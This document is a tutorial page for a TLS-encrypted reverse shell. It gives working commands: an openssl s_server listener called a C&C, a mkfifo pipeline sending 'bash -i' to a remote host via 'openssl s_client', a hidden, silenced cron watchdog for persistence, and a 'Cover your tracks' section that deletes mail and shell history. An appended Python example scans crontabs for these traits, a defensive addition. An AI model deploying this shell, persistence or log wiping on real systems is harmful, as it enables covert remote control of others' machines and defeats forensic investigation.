Encrypted reverse shell


The problem is that after a while, the connection might be lost and the process is stuck there so it does not get re-initialized by the cron job. This is why we start by killing it.

A shebang is required, otherwise job control and a decent shell environment are missing.

We tried putting the bash/openssl process in the background, but the script fails to run correctly in that situation. In any case, it is best to keep that last rm so that whenever the reverse shell fails to run (C&C is inactive), no stray, strangely named pipe file is left lying in /tmp/ or /var/tmp/.

Warning: we cannot simply use run-parts hourly cron jobs, because that ends up sending an email when the connection gets interrupted. Better to set up the cron job manually.

Listener (C&C)

as user

cd ~/
openssl req -x509 -newkey rsa:2048 -keyout self.key -out self.crt -days 9999 -nodes
openssl s_server -quiet -key self.key -cert self.crt -port 8443 \
        -CAfile selfy.crt -Verify 0 -verify_return_error

Note the uppercase V in -Verify here: it forces the client certificate check.

You can also set up a screenrc dotfile for that purpose

screen -t "victim1" 1 $HOME/victim1


openssl req -x509 -newkey rsa:2048 -keyout selfy.key -out selfy.crt -days 9999 -nodes


nmap -p 8443 $CC

/usr/bin/pkill openssl
/bin/rm -f /var/tmp/s
/bin/mkfifo /var/tmp/s
/bin/bash -i < /var/tmp/s 2>&1 \
    | /usr/bin/openssl s_client -quiet -connect $CC:8443 \
    -cert /var/tmp/selfy.crt -key /var/tmp/selfy.key \
    -CAfile /var/tmp/self.crt -verify 0 -verify_return_error \
    > /var/tmp/s 2>/dev/null
/bin/rm -f /var/tmp/s

Note openssl’s stderr goes to null and that’s fine.

Ready to go

Eventually put this in place as an executable watchdog

crontab -e -u THAT-USER

for testing

* * * * * /path/to/somehiddenfile

You should be able to read the output as local mail. Once switched to production, there should be no logs at all, not even a mention of the cron job.

*/5 * * * * /path/to/somehiddenfile >/dev/null 2>&1


Wait for a while and you will get the shell

echo lala > /dev/stdout
echo lala > /dev/stderr

Cover your tracks

cd ~/
ls -alhtrF | tail
ls -alhF mail/
rm -rf mail/ .addressbook .pine*
grep '^From ' /var/mail/root | tail -2
history -c
rm -f .bash_history


We would need a login shell, and the fact that it gets executed from a cron job hinders that. The -i argument to Bash apparently does not help. We get this on the C&C side:

bash: cannot set terminal process group (3852): Inappropriate ioctl for device
bash: no job control in this shell

Eventually, pin the client certificate using a TPM
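
Seen from the defending side, the watchdog described above leaves two reviewable artifacts: the crontab entry and the script it runs. The following is an added example, not part of the original page, that audits a crontab and reports entries whose target script pairs an openssl s_client connection with an interactive shell fed from a file. The rule names, the read_script callback and the sample address are assumptions of this example.

```python
import re

# Traits of the watchdog script shown on this page (rule names are this example's own).
RULES = {
    "tls_client": re.compile(r"\bopenssl\s+s_client\b.*?-connect\s+\S+:\d+", re.S),
    "shell_fed_from_file": re.compile(r"\b(?:ba|da|z|k)?sh\s+-i\s*<\s*\S+"),
    "fifo_in_tmp": re.compile(r"\bmkfifo\s+/(?:var/)?tmp/\S+"),
    "client_key_in_tmp": re.compile(r"-key\s+/(?:var/)?tmp/\S+"),
}
SILENCED = re.compile(r">\s*/dev/null\s+2>&1\s*$")


def script_findings(text):
    """Names of the rules matching a script body or a process command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def audit_crontab(crontab_text, read_script):
    """Report cron entries whose target script pairs a TLS client with a shell.

    read_script(path) is a hypothetical callback returning the file's text or None.
    """
    reports = []
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 5)
        if len(fields) < 6 or fields[0].startswith("#"):
            continue  # variable assignments, comments, blank lines
        command = fields[5]
        body = read_script(command.split()[0]) or ""
        hits = script_findings(body)
        # Requiring both traits keeps ordinary `openssl s_client` debugging from alerting.
        if {"tls_client", "shell_fed_from_file"} <= set(hits):
            reports.append({"schedule": " ".join(fields[:5]), "command": command,
                            "silenced": bool(SILENCED.search(command)), "hits": hits})
    return reports


# Constructed sample input: the page's script with a TEST-NET address in place of $CC.
SAMPLE_SCRIPT = """#!/bin/bash
/bin/mkfifo /var/tmp/s
/bin/bash -i < /var/tmp/s 2>&1 \\
    | /usr/bin/openssl s_client -quiet -connect 192.0.2.10:8443 \\
    -cert /var/tmp/selfy.crt -key /var/tmp/selfy.key > /var/tmp/s 2>/dev/null
"""
SAMPLE_CRONTAB = ("MAILTO=ops\n*/5 * * * * /path/to/somehiddenfile >/dev/null 2>&1\n"
                  "0 3 * * * /usr/local/bin/backup\n")
```

On a live host, read_script would open the path named in each cron entry, and script_findings can also be run over process command lines collected from /proc.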